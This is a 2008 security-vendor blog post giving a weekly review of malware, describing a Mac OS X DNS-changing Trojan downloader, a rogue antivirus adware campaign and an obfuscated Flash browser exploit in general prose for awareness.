3 min read

Weekly Review

Bogdan BOTEZATU

December 05, 2008

Weekly Review

Normal
0

21

false
false
false

DE
X-NONE
X-NONE

MicrosoftInternetExplorer4

/* Style Definitions */
table.MsoNormalTable
{mso-style-name:”Table Normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:””;
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:”Calibri”,”sans-serif”;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:”Times New Roman”;
mso-fareast-theme-font:minor-fareast;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:”Times New Roman”;
mso-bidi-theme-font:minor-bidi;}

Trojan.OSX.Jahlav.A

This is a Trojan downloader for Mac OS X. It usually
comes as a disk image for a keygenerator/crack for various applications or as a
video codec for online streaming. Once mounted, the image shows an install
package which contains several files. Three of these files are of interes: Archive.pax.gz (which contains two files: AdobeFlash,
Mozzilaplug.plugin), preinstall, preupgrade. “AdobeFlash”, “preinstall” and “preupgrade” are exactly the
same file (bash script).

Once executed the script drops a file
using the uudecode command. This file is another shell script which installs a
crontrab entry which looks for new files to download every 5 minutes on a
remote server. If a file is found and downloaded, it will be silently executed.
This file is detected by BitDefender as MAC.OSX.Trojan.DNSChanger.A and changes
the systems Domain Name Server address. As an effect, people who think they’re
browsing to www.google.co.uk will be directed to a bogus website of the attackers choice.

It is suspected that this Trojan has
the same source as the newer Trojan.Zlob (aka Trojan.DNSChanger) versions which
basically have the same effect on Microsoft Windows operating systems. More
information about this to come in the next few days.


Adware.VirusTrigger.A

Yet another attempt to fool unknowing users
into downloading and installing rogues antivirus software. With a new design,
they are pushing the same fake products after an “online scan” that detected
lots of malware on their computers. Nothing new on this territory from
technological point of view. Here are a couple of screenshots of the new design
however. Beware of these websites!

Antivirus trigger

Full image

Full image

 

Trojan.Exploit.ANOI

What this version brings with it are just
new methods of obfuscation in order to avoid AV detection. It is a weaker
variant of Trojan.Exploit.SSX
meaning, it only tries to exploit browsers with vulnerable Flash Players. It is
using the deconcept Javascript classes library in order to detect the flash
version funning on the victims machine. After that it will server different SWF
Objects based on that, which will try to exploit the already known
vulnerability.

Information
in this article is available courtesy of BitDefender virus researchers: Daniel
Chipiristeanu, Daniel Radu

tags


Author



Right now

Top posts

Ultimate Privacy Guide for Your Facebook Account

Ultimate Privacy Guide for Your Facebook Account

August 31, 2021

6 min read
7 Signs It’s Time to Use Parental Controls On Your Family’s Devices

7 Signs It’s Time to Use Parental Controls On Your Family’s Devices

August 27, 2021

2 min read
Your Netflix Account May Be on Sale on Darkweb. Protect It

Your Netflix Account May Be on Sale on Darkweb. Protect It

August 13, 2021

3 min read
E-mails claiming your computer was hacked and your privacy exposed - what you need to know (spoiler: you can relax - they’re bluffing)

E-mails claiming your computer was hacked and your privacy exposed - what you need to know (spoiler: you can relax - they’re bluffing)

July 29, 2021

5 min read
Watch Out for These Ongoing Bank of America Phishing Campaigns Targeting Customers in the US

Watch Out for These Ongoing Bank of America Phishing Campaigns Targeting Customers in the US

July 16, 2021

3 min read
How to protect yourself against cyberstalking

How to protect yourself against cyberstalking

July 06, 2021

2 min read

FOLLOW US ON

SOCIAL MEDIA


You might also like

How to keep your Android device immune to malicious vaccine themed apps How to keep your Android device immune to malicious vaccine themed apps
Cristina POPOV

April 22, 2021

2 min read
Facebook Takes Down Two Hacking Groups Operating out of Palestine Facebook Takes Down Two Hacking Groups Operating out of Palestine
Silviu STAHIE

April 22, 2021

2 min read
Ransomware attack causes supermarket cheese shortage in the Netherlands Ransomware attack causes supermarket cheese shortage in the Netherlands
Graham CLULEY

April 13, 2021

2 min read